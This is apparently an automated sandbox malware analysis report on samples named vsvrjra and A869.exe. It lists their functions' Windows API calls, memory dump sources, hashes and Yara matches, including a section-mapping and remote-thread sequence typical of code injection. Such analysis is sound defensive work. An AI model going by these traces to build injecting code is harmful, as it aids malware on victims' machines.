
Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2073745396.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vsvrjra.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2073745396.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vsvrjra.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000005.00000002.2073745396.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vsvrjra.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 00415C20 Relevance: 44.0, APIs: 23, Strings: 2, Instructions: 271
filelibrarypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415CF2
ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00415D0B
FindAtomW.KERNEL32(00000000), ref: 00415D12
SetConsoleMode.KERNEL32(00000000,00000000), ref: 00415D1A
SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415D32
SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00415D59
MoveFileW.KERNEL32(00000000,00000000), ref: 00415D61
GetVersionExW.KERNEL32(?), ref: 00415D6E
DisconnectNamedPipe.KERNEL32(?), ref: 00415D81
ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 00415DC6
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415DD5
LCMapStringA.KERNEL32(00000000,00000000,004183C0,00000000,?,00000000), ref: 00415DEB
PulseEvent.KERNEL32(00000000), ref: 00415DFB
SetCommState.KERNELBASE(00000000,00000000), ref: 00415E24
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00415E55
GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415E66
BuildCommDCBA.KERNEL32(00000000,00000000), ref: 00415E6E
GetTimeFormatW.KERNEL32(00000000,00000000,?,004183EC,?,00000000), ref: 00415EAE
GetFileAttributesA.KERNEL32(00000000), ref: 00415EB5
GetConsoleAliasExesLengthA.KERNEL32 ref: 00415EBB
GetBinaryType.KERNEL32(0041842C,?), ref: 00415ECD
LoadLibraryA.KERNELBASE(00418438), ref: 00415F52

Strings

}$, xrefs: 00415FA7
k`, xrefs: 00415F83

Memory Dump Source

Source File: 00000005.00000002.2073771249.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_vsvrjra.jbxd

Similarity

API ID: Console$CommFile$LengthReadStringType$AliasAliasesAtomAttributesBinaryBuildCompareConfigDefaultDisconnectEventExchangeExesFindFormatInterlockedLibraryLoadModeModuleMoveNameNamedOutputPathPipePulseSearchStateTimeVersion
String ID: k`$}$
API String ID: 2545807588-956986773
Opcode ID: 87a73dc456498ccd6cf10fd0e6ff5224145c6502590b1386d6c04f00a117fefb
Instruction ID: 9088986ea41186524788a2102304772e7f24ba617efa9d05027aa238ecf44273
Opcode Fuzzy Hash: 87a73dc456498ccd6cf10fd0e6ff5224145c6502590b1386d6c04f00a117fefb
Instruction Fuzzy Hash: 6BA1E371845A24EBC720DB65EC44ADF7BB8EF89751F40406AF50AA7190DB381A81CFED

Function 02CC003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02CC024D

Strings

cess, xrefs: 02CC018D
kernel32.dll, xrefs: 02CC008F, 02CC0095

Memory Dump Source

Source File: 00000005.00000002.2075651122.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2cc0000_vsvrjra.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: eb4fb2c8579feb1d98d09637ed203926217431dc0c01c4b43d6d7397d26ae795
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 83526974A01229DFDB64CF58C984BACBBB1BF09304F1480E9E94DAB351DB30AA95DF14

Function 004158A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(02B19CE8), ref: 0041597F
GetProcAddress.KERNEL32(00000000,0041BCD0), ref: 004159BC
VirtualProtect.KERNELBASE(02B19B2C,02B19CE4,00000040,?), ref: 004159DB

Strings

, xrefs: 004158E5

Memory Dump Source

Source File: 00000005.00000002.2073771249.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_vsvrjra.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: c9706728d37e00871e7f67ced595d0c79eb19ddcf454875c36666ff37d1ec3ad
Instruction ID: 9f4e34dfc4b6fe9394a1db25d0a6d7b53828682d58b9ddec5cea0b2bad73ce3c
Opcode Fuzzy Hash: c9706728d37e00871e7f67ced595d0c79eb19ddcf454875c36666ff37d1ec3ad
Instruction Fuzzy Hash: 3D3167149487C0CAE301CB78F8547823FA2EB25744F44847CD189873A5EFBA1524D7EE

Function 02D7A63E Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02D7A666
Module32First.KERNEL32(00000000,00000224), ref: 02D7A686

Memory Dump Source

Source File: 00000005.00000002.2075795209.0000000002D77000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D77000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d77000_vsvrjra.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 194f3d55e163c57cb0267fe4bae167178ca8d7db861fd52beb93c5b5f9b202d7
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: B6F09636500B10ABD7203BF9988DB6E76E8AF49628F100528E646916C0EB78EC458A61

Function 02CC0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02CC0223,?,?), ref: 02CC0E19
SetErrorMode.KERNELBASE(00000000,?,?,02CC0223,?,?), ref: 02CC0E1E

Memory Dump Source

Source File: 00000005.00000002.2075651122.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2cc0000_vsvrjra.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 59145803a341f42eb765d6959b20131ad0ef228589562980b91258829723d85c
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 72D01231145128B7D7003A94DC09BCD7B1CDF05B66F108011FB0DD9080C770964046E5

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2073745396.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vsvrjra.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2073745396.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vsvrjra.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2073745396.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vsvrjra.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2073745396.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vsvrjra.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 02D7A2FD Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02D7A34E

Memory Dump Source

Source File: 00000005.00000002.2075795209.0000000002D77000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D77000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d77000_vsvrjra.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: b5a6d2207a1586b9011399bcae5568eecdf95c6c5d9ad65ff51adf11fbf776e6
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 9E112A79A00208EFDB01DF98C985E98BBF5AB08350F158094F9489B361E375EA50DF90

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2073745396.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vsvrjra.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Function 00415870 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,02B19CE4,00415F0B), ref: 00415878

Memory Dump Source

Source File: 00000005.00000002.2073771249.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_vsvrjra.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: edc34b9f6b4820ea05e34d55aad0c07fdf7bc1d6d5b6794533697c47ab2511c9
Instruction ID: d7b87d211da148203f6924bb85ac0980f9e485e76abd759aca5fb629b3ee17cc
Opcode Fuzzy Hash: edc34b9f6b4820ea05e34d55aad0c07fdf7bc1d6d5b6794533697c47ab2511c9
Instruction Fuzzy Hash: D3B092B0DC46409BD7008BA0A814B513AA4E308742F404461F505C2180DA2014208F14

Non-executed Functions

Function 00415A70 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 00415AA1
WritePrivateProfileStringA.KERNEL32(00418384,0041835C,00418330,0041830C), ref: 00415AC5
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415ACD
GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00415B0D
GetComputerNameW.KERNEL32(?,?), ref: 00415B21
SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415B2F
OpenJobObjectA.KERNEL32(00000000,00000000,004183B4), ref: 00415B3E
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00415B4F

Strings

-, xrefs: 00415B5C

Memory Dump Source

Source File: 00000005.00000002.2073771249.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_vsvrjra.jbxd

Similarity

API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
String ID: -
API String ID: 113859268-2547889144
Opcode ID: a2c051fec9ab3a8fcdae7612af1167ef9935c89225a402f84f65136c1e913747
Instruction ID: 60e73b42405168cd9d510addef8ef3a8b6b73bded157f1632dd387b8ccc8cba3
Opcode Fuzzy Hash: a2c051fec9ab3a8fcdae7612af1167ef9935c89225a402f84f65136c1e913747
Instruction Fuzzy Hash: 9A21FB31A84348EBD7209F94DC85FDA7B74FB4CB52F1041AAF649AA1C0CAB41AC48F59

Function 00415B90 Relevance: 6.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00415BC4
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415BDF
HeapDestroy.KERNEL32(00000000), ref: 00415BFE
GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415C06

Memory Dump Source

Source File: 00000005.00000002.2073771249.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_vsvrjra.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
String ID:
API String ID: 367530164-0
Opcode ID: 28caf57345e6d0fcc585ba126ae085f4f289dabcd7c9f6727abea3362d7c0c3f
Instruction ID: bd69beaec25cac2caedfc94357a42cf62531597c09bd692e524a47bad036f564
Opcode Fuzzy Hash: 28caf57345e6d0fcc585ba126ae085f4f289dabcd7c9f6727abea3362d7c0c3f
Instruction Fuzzy Hash: CD012630A84704DBD740EBB4ED45BEA7BB8FB0C746F404077F60A97280DE3428548B9A

Analysis Process: A869.exePID: 2028, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	11.8%
Dynamic/Decrypted Code Coverage:	18.9%
Signature Coverage:	9.7%
Total number of Nodes:	175
Total number of Limit Nodes:	10

Executed Functions

Function 00415C90 Relevance: 44.0, APIs: 23, Strings: 2, Instructions: 283
filelibrarypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415D62
ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00415D7B
FindAtomW.KERNEL32(00000000), ref: 00415D82
SetConsoleMode.KERNEL32(00000000,00000000), ref: 00415D8A
SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415DA2
SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00415DC9
MoveFileW.KERNEL32(00000000,00000000), ref: 00415DD1
GetVersionExW.KERNEL32(?), ref: 00415DDE
DisconnectNamedPipe.KERNEL32(?), ref: 00415DF1
ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 00415E36
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415E45
LCMapStringA.KERNEL32(00000000,00000000,004183C0,00000000,?,00000000), ref: 00415E5B
PulseEvent.KERNEL32(00000000), ref: 00415E6B
SetCommState.KERNELBASE(00000000,00000000), ref: 00415E94
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00415EC5
GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415ED6
BuildCommDCBA.KERNEL32(00000000,00000000), ref: 00415EDE
GetTimeFormatW.KERNEL32(00000000,00000000,?,004183EC,?,00000000), ref: 00415F1E
GetFileAttributesA.KERNEL32(00000000), ref: 00415F25
GetConsoleAliasExesLengthA.KERNEL32 ref: 00415F2B
GetBinaryType.KERNEL32(0041842C,?), ref: 00415F3D
LoadLibraryA.KERNELBASE(00418438), ref: 00415FC2

Strings

k`, xrefs: 00415FF3
}$, xrefs: 00416017

Memory Dump Source

Source File: 00000007.00000002.2438988565.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_40b000_A869.jbxd

Similarity

API ID: Console$CommFile$LengthReadStringType$AliasAliasesAtomAttributesBinaryBuildCompareConfigDefaultDisconnectEventExchangeExesFindFormatInterlockedLibraryLoadModeModuleMoveNameNamedOutputPathPipePulseSearchStateTimeVersion
String ID: k`$}$
API String ID: 2545807588-956986773
Opcode ID: ee9f9be1eea3864904fa2604a43f6a26db7559f4d69b73e0e97a970f018646e0
Instruction ID: 500cb7f68f8a5735401a0a6ba47bc000e865cb3074ff61a672bf7834970157e8
Opcode Fuzzy Hash: ee9f9be1eea3864904fa2604a43f6a26db7559f4d69b73e0e97a970f018646e0
Instruction Fuzzy Hash: 96A1E271845A24DBC720DB65EC58ADF7B78EF8D351F40406AF50AA7290DB381A81CBED

Function 004014FB Relevance: 10.8, APIs: 7, Instructions: 316
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_A869.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
Instruction ID: 8456862ab07ee4fd5df19115d19177d22808884b2e91bbb4bd05fd593ecc01b1
Opcode Fuzzy Hash: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
Instruction Fuzzy Hash: CFA1E3B1604215BFDF218F95CC45FAB7BB8EF82710F14006BE942BB1E1D6399902DB5A

Function 004015FB Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0

Memory Dump Source

Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_A869.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
Instruction ID: eff60cd738278fe88036fd12be8a847ac689736a027776baabbfcbb81c570d02
Opcode Fuzzy Hash: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
Instruction Fuzzy Hash: 20512DB4900205BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759945CB64

Function 00401613 Relevance: 10.7, APIs: 7, Instructions: 176
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0

Memory Dump Source

Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_A869.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
